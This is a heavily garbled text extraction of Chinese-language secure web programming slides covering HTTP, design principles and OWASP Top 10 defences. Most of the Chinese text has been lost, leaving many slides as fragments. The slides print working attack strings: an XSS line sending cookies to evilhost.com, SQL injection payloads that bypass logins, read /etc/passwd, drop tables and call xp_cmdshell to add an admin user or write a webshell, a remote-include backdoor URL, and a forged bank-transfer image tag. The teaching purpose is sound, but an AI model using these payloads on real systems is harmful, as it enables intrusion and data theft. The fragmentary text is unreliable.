Docstoc

Secure Web Programming - PDF

Document Sample
Secure Web Programming - PDF Powered By Docstoc
					Secure Web Programming
         < Fred.Weng@sti.com.tw >
   :              IT                         -
    :
          (C++    ASP.NET       C#):
 – PKI                                 DRM
CMMI
SOC(Security Operation Center)

DLP (Data Loss Prevention)


CEH (Certified Ethical Hacker)
CISSP (Certified Information Systems Security Professional )
HTTP



 OWASP Top 10
 Others
             :
358   –
359   –
360   –
361   –             1/2
362   –
363   – 358 ~ 360
Gartner said …..



                      Web         10%
                   Applications


          75%                     90%



                    Network
                     Server
          25%



      Gartner : “2/3                    ”
         …
:




    ->
             (Taiwan)
(http://www.itis.tw/compromised)
                       (Global)
Zone-h (http://www.zone-h.org/archive/published=0)
Web ATM site   !
ATM
   ….
(http://anti-
hacker.blogspot.com/search/label/%E6%96%B0%E8%81%9E%E4%BA%8
B%E4%BB%B6)
Browser                    Web Server @ DMZ


          Internet
                                         Web AP
          HTTP Request
                                         -OS
                                         -
          HTTP Response
           -
           -   cookie
           -




                          DB Server @ Intranet
HTTP

       16
Protocol Position
    HTTP - HyperText
    Transfer Protocol

      RFC
      – 1945
      – 2616 , 2617
      – 2965
     Book : HTTP
     Essentials (2001)
     - Stephen Thomas
                         17
HTTP Request Format


    [Method] [URL] [Version]   (Request Line)
    [Header]: value
                                                    Header
    …….


    \n                                          (          )
    [Data]                       (Optional)         Body




                                                               18
HTTP Request Format
       :“              ”
GET /main/index.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-tw
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6;
  .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR
  3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; MSN
  OptimizedIE8;ZHTW)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.isecutech.com.tw
Pragma: no-cache
Cookie: __utma=232091143.867869796.1244101550.1249441651.1249542945.41;
  __utmz=232091143.1244101550.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none
  ); __utmb=232091143; __utmc=232091143;
  ASP.NET_SessionId=b3ys5m45tfsh1i55hzhkenfw
                                                                             19
HTTP Request Format
       :
POST /user/login.htm HTTP/1.1
Referer: https://member.ruten.com.tw:443/user/login.htm
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Host: member.ruten.com.tw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
  1.1.4322)
Pragma: no-cache
Cookie: __utma=1.1668397861.1187588741.1187588741.1187588741.1; __utmc=1;
  __utmz=1.1187588741.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);
  __utmb=1; __utmb=1

userid=777-777-1911form%40value777.com&button=%b5n%a4J&userpass=admin

                                                                               20
HTTP Response Format


    [Version] [Status]   (Status Line)
    [Header]: value
                                             Header
    …….


    \n                                   (          )
    [Data]                 (Optional)        Body




                                                        21
HTTP Response Format
       :“               ”
HTTP/1.1 200 OK
Date: Thu, 06 Aug 2009 07:20:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 119260

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Information Security ……..
………………………………………
………………………………………
                                              22
  HTTP
WebProxy : BurpSuite   Demo   ….
Request : Method


   GET
   POST                       (      )
   CONNECT         ( proxy)

   HEAD                  Header
   OPTIONS                  Method
   TRACE
   PUT
   DELETE

                                         24
GET
  Sample :
  GET / HTTP/1.0
  Host: www.google.com
  \n
POST
  Sample :
       POST /login.asp HTTP/1.1
       Host: www.google.com
       Content-Length: 21
       \n
       username=abc&test=123

             21 characters
  With URL Encoding
       POST /login.asp HTTP/1.1
       Host: www.google.com
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 33
       \n
       username=%61%62%63&test=%31%32%33
                                                         26
                       33 characters
HEAD
 Banner grabbing by telnet
 Sending “HEAD / HTTP/1.0” to www.hinet.net port 80




                                                      27
OPTIONS




          28
Headers : General


   Connection
                       (explicitly close persistent connections)
   Content-Type        Body                (MIME-Type)
   Content-Length      Body                 (bytes)
                       Note : This header is send for most static
                       documents, but not for dynamically generated
                       content
   Content-Encoding    Body
   Transfer-Encoding   Body                       (e.g. chunked)




                                                                      29
Headers : for Request


 Accept
 Accept-Encoding               Body
 Accept-Language               Body
 Cookie              cookie
 Host                         (IP   DN)
 If-Modified-Since   cache
 Refer
 User-Agent


                                          30
Headers : for Response


  Date
  Server                 Web
  Location
  WWW-Authenticate
  Keep-Alive                    (Persistent)
  Set-Cookie         cookie
  X-Powered-By
  Cache-Control                cache
  Pragma
  Expires                                      31
Response : Status Code

    Status Code
    1XX           Information
    2XX           Success
    3XX           Redirection
    4XX           Client Error
    5XX           Server Error
   Reference :
      http://www.w3.org/Protocols/rfc2616/rfc2616-
      sec10.html
      http://en.wikipedia.org/wiki/List_of_HTTP_status_co
      des
                                                        32
Response : Status Code
          Status Code
     200 - OK
     301 - Moved Permanently (Redirect)
     302 - Moved Temporarily(Found) (Redirect)
     304 - Not Modified (for Cache)
     400 - Bad Request
     401 - Unauthorized (Authorization Required)
     403 - Forbidden
     404 - Not Found
     500 - Internal Server Error

                                               33
     ?
          : HTTP
          :        !     AP
Session          AP
          AP
          AP



 –        SSL
 –          AP
 –                  AP
               AP             34
HTTP Authentication
           GET /test.asp HTTP/1.1
           Host: www.example.com

           HTTP/1.1 401
           Authorization Required
           ………
           WWW-Authenticate: Basic

           GET /test.asp HTTP/1.1
           Host: www.example.com
           Authorization: Basic
           YWJjOjEyMz==


           HTTP/1.1 200 OK
           ………

                                     35
HTTP Authentication (cont.)
   Header
     Response
      – 401 Authorization Required
      – WWW-Authenticate: [Mech]
                [Mech]
               Basic
               Digest
               Integrated (NTLM Kerberos)
     Request
      – Authorization: [Mech] value



                                            36
Encoding (               ) : Base64      HTML Encoding
          f(data)




Hash (                   ) : MD5      SHA1
          f(data)




Encrypt (               ) : AES   (http://www.rsa.com/rsalabs/node.asp?id=2176)

         f(data, key)



                                                                           37
HTTP Authentication (cont.)
   Basic
     Base64 encoding of {username:password}

              SSL
   Digest
     Hash of password
              IIS



                                              38
HTTP Authentication (cont.)
   Integrated Windows Authentication
          challenge/response model

     NTLM
      –            IIS
      –       client
     Kerberos
      – NTLM             (                  )
      – Client    Kerberos Server       IIS
           domain           trusted domain.

                                                39
    Cookie

                                        GET /test.asp HTTP/1.1
                                        Host: www.example.com


                                        HTTP/1.1 200 OK
                                        ………
                                        Set-Cookie: UID=ABC
Cookie Table

Domain            Path   Name   Value

www.example.com   /      UID    ABC     GET /test.asp HTTP/1.1
                                        Host: www.example.com
                                        Cookie: UID=ABC




                                                                 40
Cookie
   in Response Header
     Set-Cookie: [NAME]=[VALUE];
     path=[PATH]; expires=[TIME];
     domain=[DOMAIN]

   in Request Header
     Cookie: [NAME1]=[VALUE1];
     [NAME2]=[VALUE2] ...


   Stored in Client Slide (per Browser)
                                          41
      Session
                                          POST /login.asp HTTP/1.1
                                          Host: www.example.com
                                          Content-Length: 24


                                          UID=XYZ&Password=pass932

                                          HTTP/1.1 200 OK
                                          ………
                                          Set-Cookie: SESSID=0002
Cookie Table

Domain            Path   Name     Value

www.example.com   /      SESSID   0002
                                          GET /test.asp HTTP/1.1
                                                                     SESSID:0001
                                          Host: www.example.com        UID=ABC
                                          Cookie: SESSID=0002
                                                                     SESSID:0002
                                                                       UID=XYZ


                                                                                   42
Session
    Stored in Server Side (per User)

      URL Parameter
      Hidden Form Data Field
      Cookie
                    cookie
      PHPSESSID
      ASPSESSIONID
      JSESSIONID
                                       43
HTTPS
  HTTP+ SSL(Secure Sockets Layer)
    SSL is designed to encrypt “any” TCP/IP
    based network traffic
     –
     –
     –                  (       )




                                              44
SSL Handshake + Secure Channel
     Client                                                                 Server
                                    Supported SSL/TLS Version Cipher
              ClientHello           Method SessionID Random Data

              Used SSL/TLS Version Cipher
              Method SessionID Random Data                 ServerHello

              Chain of Certificate/Public Key            Certificate

                                                    ServerHelloDone
                                                Send client key encrypted
              ClientKeyExchange                 by server’s public key


              ChangeCipherSpec                          Verify Cipher/Key


              Finished

               Verify Cipher/Key                 ChangeCipherSpec

                                                                Finished


                                                                                     45
Gmail Login using SSL
47
  Check CA in the              https://atm.bank.com.tw/
  Certificate …
  Verisign ! OK,I
    trusted him
                               Certificate + Public Key


                               Encrypted data by the
                               exchanged shared cipher
                               key




http://www.study-area.org/tips/certs/certs.html
                                                          48
 Check CA in the   https://atm.bank.com.tw/
 Certificate …
1234 CA! Who ???

                   Certificate + Public Key




                                              49
Security Warning

                   CA




                        Common Name




                                      50
         = SSL?
SSL                               !
SSL            ?
                  (Black Hat 2009)
 Moxie          SSLSNIF                 SSL

                  SSL         Twitter
 (http://www.itis.tw/node/3355)


                                              51
   External Systems are Insecure
   Minimize Attack Surface Area
   Secure Defaults
   Least Privilege
   Separation of Duties
   Defense in Depth
   Fail Securely
   Do not trust Security through
   Obscurity
   Simplicity                                                             http://farm4.static.flickr.com/3009/2593535211_
                                                                          943673c680_m.jpg




Saltzer, J. H., and Schroeder, M. D., “The Protection of Information in Computer System”,
Fourth ACM Symposium on Operation Systems Principles, October 1974.
                                                                                                                      53
External Systems are Insecure

     HTTP Message
      –
      –        (       )
      –
      –    HTTP
           Referer
           Cookie ……

                       (RPC Web Service   Email ….)


     DNS


                                                      54
External Systems are Insecure (cont.)

              :
                       “        ”
          :


                   SQL Injection
     OS            Command Injection
                   Code Injection
                   XSS Attack
                   Malicious File Execution
                   Insecure Direct Object Reference

                                                      55
External Systems are Insecure (cont.)
                                              Java
   Script
                            !!!
      – Rebuild Web Page
      – Use Web Proxy
      – Use Browser Extensions    Demo   ….
      – Write Program
                            !


                                                 56
External Systems are Insecure (cont.)



      –
          somefile.dat
          c:\temp\subdir\..\somefile.dat
          .\somefile.dat
          c%3A%5Ctemp%5Csubdir%5C%2E%2E%5Csomefile
          .dat ( c:\temp\subdir\..\somefile.dat)
      – . (period) = ASCII 2E = Unicode C0 AE = …


                                                    57
External Systems are Insecure (cont.)
    Constrain, Reject, and Sanitize Input




                                            58
Minimize Attack Surface Area




                                                                                  v.s.




 http://1863.img.pp.sohu.com.cn/images/2008/9/11/19/6/11cf7e91309g213.jpg

                                        http://i565.photobucket.com/albums/ss99/whayu0915/0089.jpg
                                                                                                     59
Minimize Attack Surface Area




                   !!!      http://www.aemma.org/training/mounted/images/goliath.jpg




      – Slammer and
        CodeRed
      –     SQL Injection
                                                                                       60
Minimize Attack Surface Area (cont.)
                    : Jboss 0Day (2010.4)
              Good Management Tool : JMX-Console
                –                                               :            HEAD
         :




                                                                                    61
(http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html)
Secure Defaults


                /



      –
      –     /             !
                    vs.




                              62
Least Privilege
    Run with just enough privilege to get the
    job done, and no more!




                                                63
Separation of Duties




            :        http://photo.espnstar.com.cn/uploadimages/2008/0913/2008913231837.jpg


     Administrator                                     ?!
      –>             ?!
      –>                  ?!
                                                                                             64
Defense in Depth - Architecture
                                                    DB Server


                                         Firewall
                                                          IPSec
                            Web Server



                  Web AP Firewall

                      IPS
     Firewall


                                             DLP

                SSL


                                                           Anti-Virus
Defense in Depth – SW Models

                        Check security
     Check security
                         Application.dll




    Application.exe
                                           Secure
                                           resource
    Check security                         with an ACL

                      Application.dll

                      Check security
                                                         66
Fail Securely

   DWORD dwRet = IsAccessAllowed(…);
   if (dwRet == ERROR_ACCESS_DENIED) {
         // Security check failed.
         // Inform user that access is denied
   } else {
         // Security check OK.
                                               What if
        // Perform task…                  IsAccessAllowed()
   }                                           returns
                                            ERROR_NOT_
                                         ENOUGH_MEMORY?



                                                              67
Fail Securely(cont.)
    Do NOT:




    Do:
          exception handling blocks




                                      68
Do not Trust Security through Obscurity
             “   ”     ……
                            HTML
                 URL



       ….




                                     69
Simplicity




                                    !
 Simple is Beauty !
   Design Pattern ! Coding Standard !
   Code Review      Easy to Find Security Flaws
   Code Maintenance Easy to Fix Security Flaws
 Documentation !                                  70
Web Application Vulnerabilities
      and Protections
OWASP
         (http://www.owasp.org/index.php/Main_Page)

  Open Web Application Security Project
     Web
                                       82
                               Web


               :
     –                 (FTC)
         PCI
           30                           OWASP Top 10(
      Web      )      WebGoat(     )         Enterprise
    Security API (ESAPI) OWASP Guide Project


                                                      72
OWASP 2010
(http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)

2007 Top 10 (Old)                                 2010 Top 10 (New)
Cross-Site Scripting (XSS)                        A1. Injection

Injection Flaws                                   A2. Cross-Site Scripting (XSS)

Malicious File Execution                          A3. Broken Authentication and Session Management

Insecure Direct Object Reference                  A4. Insecure Direct Object References

Cross-Site Request Forgery (CSRF)                 A5. Cross-Site Request Forgery (CSRF)

Information Leakage and Improper Error Handling   A6. + Security Misconfiguration

Broken Authentication and Session Management      A7. Insecure Cryptographic Storage

Insecure Cryptographic Storage                    A8. Failure to Restrict URL Access

Insecure Communication                            A9. Insufficient Transport Layer Protection

Failure to Restrict URL Access                    A10. + Unvalidated Redirects and Forwards




                                                                                                73
OWASP Top10(2007)-1
 Cross-Site Scripting
OWASP Top 10 (2007) - 1
   Cross-Site Scripting
     CSS   XSS
                 :


      –
      –
                            “      ”
                          Script


                                       75
XSS   :   !




              76
                           XSS !


<%
 ...
 Response.Write “<div class=‘label’>                    </div><br />"
 Response.Write “        : " & Request.Form(“SearchKeyWord")
 ...
%>




                                                                        77
XSS   (cont.)




                78
XSS   :




          79
80
       XSS
          URL –
http://www.wretch.cc/blog/blog.php?id=VIPBlog&search=
<script>alert(document.cookie)</script>&search_title=1




                                                    81
http://www.wretch.cc/blog/blog.php?id=VIPBlog&search=
<script>location.replace(“http://www.evilhost.com/getcooki
e.asp?k=“+document.cookie)</script>&search_title=1

http://www.wretch.cc/blog/blog.php?id=VIPBlog&search=
%3C%73%63%72%69%70%74%3E%6C%6F%63%61%7
4%69%6F%6E%2E%72%65%70%6C%61%63%65%28%
53%74%72%69%6E%67%2E%66%72%6F%6D%43%68
%61%72%43%6F%64%65%28%31%30%34%2C%31%31
%36…( )&search_title=1

        blog         /_\                         …
                                                        82
cookie




         83
                                         ?
(http://anti-hacker.blogspot.com/2009/08/sorry.html)




                                                       84
YouTube



          ?!




               85
XSS Shell




            86
XSS Shell (cont.)




                    87
XSS Worm
  2005 : Samy Worm
                     MySpace
           :
     –             Profile     “Samy is my hero”
     – 2005.10.4          20
  2007 :




                                                   88
             +                     !

                    !

set Reg = new RegExp
with Reg
   .Pattern = "['”#:;()<>,=+ ]"
   .Global = True                    <<script>>… ?!
                                     <scr<script>ipt> ….?!
end with
test = Reg.Replace( Request.QueryString(“test”) , “” )

   ?
                                                             89
                     (cont.)
             .NET 1.1                         ….
                               <script>alert("hello!")</script>




             :

or in web.config :




                                                            90
      (cont.)
              : Sanitization(                 )
                                          “       ” !!!
–                                      HTML-Encoding




PHP: Ensure output is passed through
htmlentities() or htmlspecialchars()

–                       URL URL-Encoding
       e.g. HttpUtility.UrlEncode()                       91
            (cont.)
.NET             :
<script runat="server">
void searchBtn _Click(object sender, EventArgs e) {
Response.Write(HttpUtility.HtmlEncode(inputTxt.Text)); }
</script>
<html>
<body>
<form id="form1" runat="server">
<asp:TextBox ID="inputTxt" Runat="server" TextMode="MultiLine"
   Width="382px" Height="152px">
</asp:TextBox>
<asp:Button ID="searchBtn" Runat="server" Text="Submit" OnClick="
   searchBtn _Click" />
</form>
</body>
</html>                                                             92
   (cont.)
   Framework
– .NET
    Microsoft Anti-Cross Site Scripting Library V1.5
    (MSDN)(http://www.microsoft.com/downloads/details.a
    spx?FamilyID=efb9c819-53ff-4f82-bfaf-
    e11625130c25&DisplayLang=en)
– JAVA:
    DeXSS -- Java program for removing JavaScript from
    HTML (http://software.graflex.org/dexss)
    OWASP Stinger Project (A Java EE validation filter)
    (http://www.owasp.org/index.php/Category:OWASP_St
    inger_Project)
    How to Build an HTTP Request Validation Engine for
    Your J2EE
    Application(http://www.owasp.org/index.php/How_to_B
    uild_an_HTTP_Request_Validation_Engine_for_Your_
    J2EE_Application)                                   93
               (cont.)
MS Anti-XSS Library                        :
1: using System;
2: using Microsoft.Security.Application;
3:
4: public partial class _Default : System.Web.UI.Page
5: {
6: protected void Button1_Click(object sender, EventArgs e)
7: {
8: String Input = TextBox1.Text;
9:
10: //Encode untrusted input and write output
11: Response.Write(AntiXss.HtmlEncode(Input));
12: }
13: }

  Microsoft Anti-Cross Site Scripting Library
  http://blog.miniasp.com/post/2009/07/Recommand-Microsoft-Anti-
  Cross-Site-Scripting-Library-V30.aspx                            94
  (cont.)
– OWASP
   OWASP Enterprise Security API (ESAPI Project)
   (http://www.owasp.org/index.php/Category:OWASP_E
   nterprise_Security_API#tab=About)
    Support Languages :
        Java EE
        .NET
        Classic ASP
        PHP
        ColdFusion & CFML
        Phthon
        Haskell




                                                  95
    (cont.)

             HTTP response
 ISO-8859-1(   UTF-8)
–
– Content-Type: text/html; charset = ISO-8859-1
– For .NET :

     web.config




     Per-Page Setting



                                                  96
   XSS - DOM Based XSS
Type1 : Non-persistent / Reflected (    )
Type2 : Persistent / Stored (      )
Type3 : DOM Based XSS
                         DOM

   – document.location
   – document.URL
   – document.referrer



                                       97
    :

:


        98
99
Script
         DOM




               100
    (cont.)
         DOM
– DOM
    document.URL document.URLUnencoded
    document.location document.referrer window.location
    ….
–
    document.write(…) document.writeln(…)
    document.body.innerHtml=… document.forms[0].action=…
      document.attachEvent(…) document.create…(…)
    document.execCommand(…) document.body. …
    window.attachEvent(…) document.location.hostname=…
      document.location.replace(…)
    document.location.assign(…) window.navigate(…)
    document.open(…) window.open(…) eval(…)
    window.execScript(…) ….

                                                          101
(cont.)
    Script   (   DOM   )




                           102
OWASP Top10(2007)-2
  Injection Flaw
OWASP Top 10 (2007) - 2
   Injection Flaw

      – SQL Injection
      – OS Command Injection
      – Code Injection
      – LDAP Injection
      – XPath Injection
      – ….




                               104
SQL Injection
   SQL

                  S QL




              All !
     ASP .NET Java PHP CGI ………
     MSSQL MySQL Oracle Sybase DB2   PostgreSQL ……


                                                 105
SQL Injection (cont.)




                        106
AP




     !

         SQL
    SQL

Cookies
    HTTP Headers

–
–




                   108
                MS SQL                                                Oracle                         Postgres
                                   MySQL              Access                          DB2
                 T-SQL                                                PL/SQL                         PL/pgSQL
Concatenate
                  ' '+' '       concat (" ", " ")       " "&" "         ' '||' '     " "+" "            ' '||' '
Strings

Null replace     Isnull()           Ifnull()          Iff(Isnull())   Ifnull()       Ifnull()        COALESCE()


Position       CHARINDEX          LOCATE()              InStr()        InStr()       InStr()         TEXTPOS()

Op Sys                       select intoMS SQL
                                        outfile            MySQL      Access       Oraclefrom
                                                                                   import       DB2           Postgres
               xp_cmdshell                              #date#        utf_file                          Call
interaction                      / dumpfile                                         export to
                  UNION                         Y                 Y       Y          Y           Y                 Y
Cast              Yes                 No                  No             No           Yes               Yes
                                                             N 4.0
                Subselects                      Y
                                                             Y 4.1
                                                                             N       Y           Y                 Y


               Batch Queries                    Y              N*            N       N           N                 Y

               Default stored
                                               Many             N            N      Many         N                 N
               procedures

               Linking DBs                      Y                 Y          N       Y           Y                 N


                                                                                                                   109
SQL
SQL Injection
  Bypass Authentication
  Error Based ( ASP + MS-SQL )
  Union Based
  Update Based
  Blind
  Batch Queries (MS-SQL)
  Extended Procedure (MS-SQL Oracle )



                                        110
Bypass Authentication
                        SQL

                  :
     ‘ or ‘’=‘
     ‘ or 1=1--
     ‘ or 1=1/*
Why
                           SQL           –
  Select               Select
    *                    *
  From                 From
    Account              Account
  Where
                       Where
    username=‘[   ]’
                         username=‘admin’
    and
                         and
    password=‘[   ]’
                         password=‘‘ or 1=1--’
 Demo   ….
Error Based




                 ASP + MS-SQL

                      ?
                  :
     @@version>1--
     order by 100--
     (select cast(id as nvarchar(4000))+’|’)>1
                                                 113
Why

                                            SQL             –
     Select                           Select
       *                                *
     From                             From
       News                             News
     Where                            Where
       id= [             id]            id= 1 and
                                        @@version>1--
 SQL Injection (           )–          SQL             :
 http://www.microsoft.com/taiwan/sql/SQL_Injection_G1.htm
 http://www.microsoft.com/taiwan/sql/SQL_Injection_G2.htm       114
Attack Sample

   –        :
                                 --
                   : ' HAVING 1=1--
                   : abcd
   –                      :
       SELECT * FROM tblUser WHERE UserName=‘' HAVING 1=1--'
       AND Password=‘abcd'
   –        :
                              :




                       MS SQL Server
                                        tblUser                115
                 UserID
Attack Sample
                            (cont.)
   –       :
                                                 --
                   : ' GROUP BY UserID HAVING 1=1--
                   : abcd
   –                    :
       SELECT * FROM tblUser WHERE UserName=‘' GROUP BY UserID
       HAVING 1=1--' AND Password=‘abcd'
   –       :
                            :




                                                 UserName
                                                                 116
Attack Sample
                           (cont.)
   –
               :
                  : ' GROUP BY
                                                 --
          UserID,UserName,Password,Pri HAVING 1=1--
                  : abcd
   –                   :
       SELECT * FROM tblUser WHERE UserName=‘' GROUP BY
       UserID,UserName,Password,Pri HAVING 1=1--' AND
       Password=‘abcd'
   –       :



                                                          117
Union Based
           SQL

                     :
     id=1 order by 10-- (            order by               )
     id=1 union select 1,2,3,4,5--
     id=1 union select 1,2,3,database(),5--
     id=1 union select 1,2,3,(select top 1 name from
     master..sysdatabases where dbid=7),5--
     id=1 union select 1,2,3,load_file(‘/etc/passwd’),5--


                                                            118
Why
                            SQL             –
  Select                Select
    id,user,message       id,user,message
  From                  From
    board                 board
  Where                 Where
    id= [         id]     id= 1
                        Union select
                         1,2,version()--
 Demo    ….
                                                119
Update Based

   SQL
                  :
     ‘ + @@version + ‘
     ‘ + (select name from master..sysdatabases
     where dbid=7) +’
     ‘,email=(select … ),’ …




                                                  120
Why
                               SQL          –
  Update                 Update
    Member                 Member
  Set                    Set
    email=‘[email]’,       email=‘‘ + passwd + ’’ ,
    address=‘[     ]’      address=‘[     ]’
  Where                  Where
    user=‘[           ]’   user=‘[           ]’


                                                121
Blind SQL Injection

   “Blind”
                      “   ”   “   ”
     SQL
                  :
     id=1 and 1=1
     id=1 and 1=2
     id=1 and (select top 1
     ascii(substring(passwd,1,1)) from users)>79
                                                   122
Blind SQL Injection (cont.)
        :
            True




            False




                              123
124
Batch Queries
        ;
       (MS-SQL           )
     Select / Insert / Delete / Update / Drop ….
                        Stored Procedure
                   :
     id=1 ; drop table account;--
     id=1 ; exec master..xp_cmdshell ‘net user
     Hacker Hacker /add’;--
                                 …..

                                                   125
Batch Queries (cont.)
       MS-SQL                                  ……!!
                     (MS-SQL)
 xp_cmdshell                          SQL Server

 xp_regXXXX                                  registry
 xp_servicecontrol
 xp_terminate_process
                                Process ID
 xp_dirtree
 xp_oaXXXX                                   OLE




                                                        126
127
                   !

           Query
–                         SQL
    /*
    --

–
    or 1=1--
    or 2>1--
    ‘ or ‘’=‘

–
    and 1=1--
    and 1=2--
    ‘;declare @a int;--         128
              (cont.)
–
                                <->     )
    @@version>1
–
    1/0
–
    order by 100

–    union                  query
    ‘ union select col1,col2,… from table--

–
    ;exec master..xp_cmdshell ‘net user Hacker Hacker /add’;--
    ;exec master..xp_cmdshell 'echo WEBSHELL > path/a.asp‘--
    ;exec master..xp_regread
    'HKEY_CURRENT_USER,Software\ORL\WinVNC3',Password;--


                                                                 129
                           !
        Parameterized Queries


SQL                             SQL

      SQL
–




                                      130
                               (cont.)


        Bad !     SQL Injection !!
...
string userName = ctx.getAuthenticatedUserName();
string query = "SELECT * FROM items WHERE owner = "'"
              + userName + "' AND itemname = '"
              + ItemName.Text + "'";
sda = new SqlDataAdapter(query, conn);
DataTable dt = new DataTable();
sda.Fill(dt);
...


                                                        131
                                     (cont.)
                    (.NET – C#)                                :

      string connString =
WebConfigurationManager.ConnectionStrings["myConn"].ConnectionString;
 using (SqlConnection conn = new SqlConnection(connString))
    {
       conn.Open();
       SqlCommand cmd = new SqlCommand("SELECT Count(*) FROM
Products WHERE ProdID=@pid", conn);
       SqlParameter prm = new SqlParameter("@pid", SqlDbType.VarChar, 50);
       prm.Value = Request.QueryString["pid"];
       cmd.Parameters.Add(prm);
       int recCount = (int)cmd.ExecuteScalar();
    }

                                                                       132
                                                                               (cont.)
<%
 option explicit
 dim conn, cmd, recordset, iTableIdValue                                            (ASP)
  'Create Connection
  set conn=server.createObject("ADODB.Connection")
  conn.open "DNS=LOCAL"

 'Create Command
 set cmd = server.createobject("ADODB.Command")
 With cmd
        .activeconnection=conn
        .commandtext="Select * from DataTable where Id = @Parameter"
        'Create the parameter and set its value to 1
        .Parameters.Append .CreateParameter("@Parameter", adInteger, adParamInput, , 1)
 End With
 'Get the information in a RecordSet
 set recordset = server.createobject("ADODB.Recordset")
 recordset.Open cmd, conn
 '....
 'Do whatever is needed with the information
 '....
 'Do clean up
 recordset.Close
 conn.Close
 set recordset = nothing
 set cmd = nothing
 set conn = nothing
%>                                                                                          133
                                          (cont.)
                          (Java)                          :

String custname = request.getParameter("customerName");
// perform input validation to detect attacks
String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( );




                                                                          134
                               (cont.)
                 (PHP)                      :
    – PDO (PHP Data Objects) (PHP >=5.1)
           using bindParam()


$dbh = new PDO(DB_DSN, DB_USER, DB_PASSWORD);
$sql_find_repeat = 'SELECT COUNT(*) FROM `table_name` WHERE
`col_name` = ?;';
$sth = $dbh->prepare($sql_find_repeat);
$sth->bindParam(1, $value, PDO::PARAM_STR);
$sth->execute();




                                                          135
                                       DB

           sa                            !




MS-SQL :
– sp_addextendedproc sp_addlogin sp_password
  sp_addsrvrolemember xp_cmdshell
  xp_availablemedia xp_dirtree xp_servicecontrol
  xp_subdirs ……                               136
OS Command Injection
   AP




                       137
138
(cont.)




          139
                                  :
             –                       ; | & and newline
             –                 ` (the backtick operator)
                                         API                   OS
                                      cmd.exe                  shell

             – JAVA : Runtime.exec()
             – ASP.NET : Process.Start()




                                                                       140
http://msdn.microsoft.com/zh-tw/library/h6ak8zt5(VS.80).aspx
Code Injection
    AP
                       :
     PHP : eval()
     ASP : Execute()




                           141
OWASP Top10(2007)-3
Malicious File Execution
Malicious File Execution Sample
          (PHP)
                   :
      – https://www.test.com.tw/main.php?Country=tw
      –
           $country = $_GET[‘Country’];
          include($country . ‘.php’);
                  :
      –                           “backdoor.php”
      –
          https://www.test.com.tw/main.php?Country=http://
          www.attacker.com.tw/backdoor
      –
                                                        143
–
–
     “indirect object reference map”
– https://www.test.com.tw/main.aspx?Country=1
–         :
     1   “tw.aspx”
     2 “en.aspx”
     Others    Reject !


                                                144
     OWASP Top10(2007)-4
Insecure Direct Object Reference
OWASP Top 10 (2007) - 4
   Insecure Direct Object Reference
              Web                  “
          ”
     http://www.xxx.com.tw/showPage.aspx?page=
     main.aspx
              :
      –
      –
      –    …

  Demo    ….                                146
147
      :
     (       )                 .
          : index value or a reference map
http://www.example.com/application?file=1
        : 1 “function_AddUser.aspx”
     :
                    (   Null byte)
 –                      Decoded


 – Java : java.io.File getCanonicalPath()
 – ASP.NET : System.Io.Path.GetFullPath()
          !                                  148
           (cont.)
For PHP:
  In php.ini
   –        allow_url_fopen   allow_url_include
   –        open_basedir


       :
   – include() include_once()     require()      require_once()
     fopen() imagecreatefromXXX()          file()
     file_get_contents() copy() delete() unlink()
     upload_tmp_dir()     move_uploaded_file() $_FILES
   – system()    eval() passthru() or ` (the backtick operator)



                                                                  149
     OWASP Top10(2007)-5
Cross-Site Request Forgery (CSRF)
OWASP Top 10 (2007) - 5
   Cross-Site Request Forgery (CSRF)(XSRF)




                       (     )




                                             151
How XSRF Works
Alice                              Bank.com
              /login.html


  /auth.aspx?id=Alice&pw=fmd9032
  Cookie: sessionid=40a4c04de

  /transfer.aspx?from=Alice&to=Bob&amt=$10000
  Cookie: sessionid=40a4c04de
          “Transfer Done !”



                                                152
How XSRF Works(cont.)
Alice                              Bank.com Evil.org
              /login.html


  /auth.aspx?id=Alice&pw=fmd9032
  Cookie: sessionid=41d8u31op
  /evil.html
  <IMG SRC=http://bank.com/transfer.aspx
  ?from=Alice&to=Evil&amt=$10000 >
  /transfer.aspx?from=Alice&to=Evil&amt=$10000
  Cookie: sessionid=41d8u31op
            “Transfer Done !”
                                                   153
       GET        (              )

          “      ”
General - Request ["name"]
 –        : Query String->Form->Server Variables
GET – Request.QueryString[“name”]
POST – Request.Form[“name”] ( OK)



                                              154
        (cont.)



Double confirm
Re-authenticate
Two-factor Authentication



        HTTP    “Referer”                                          !
        CAPTCHA
 –                      : Completely Automated Public Test to tell Computers
                                                                          155
     and Humans Apart
    (cont.)
           “Custom Random Token”:
–
–    :




                             random token

    session data



                         5
                                        156
 OWASP Top10(2007)-6
 Information Leakage &
Improper Error Handling
158
    .NET




(    )
           159
         (cont.)
    Framework
.NET           web.config
<customErrors mode="On|Off|RemoteOnly"
    defaultRedirect="error.html">
  <error statusCode="500" redirect="err500.aspx"/>
  <error statusCode="404" redirect="notHere.aspx"/>
  <error statusCode="403“ redirect="notAuthz.aspx"/>
</customErrors>

Java          web.xml
<error-page>
   <exception-type>UnhandledException</exception-type>
    <location>GenericError.jsp</location>
</error-page>

<error-page>
    <error-code>500</error-code>
    <location>err500.jsp</location>
</error-page>
                                                         160
    (cont.)


    Try-Catch Exceptions

–    :


            Log




                           161
 OWASP Top10(2007)-7
Broken Authentication &
  Session Management
OWASP Top 10 (2007) - 7
   Broken Authentication and Session
   Management
   Web




                                       163
test1          issuer_account
     (test2)




                            164
(cont.)




          165
(cont.)
    (cont.)
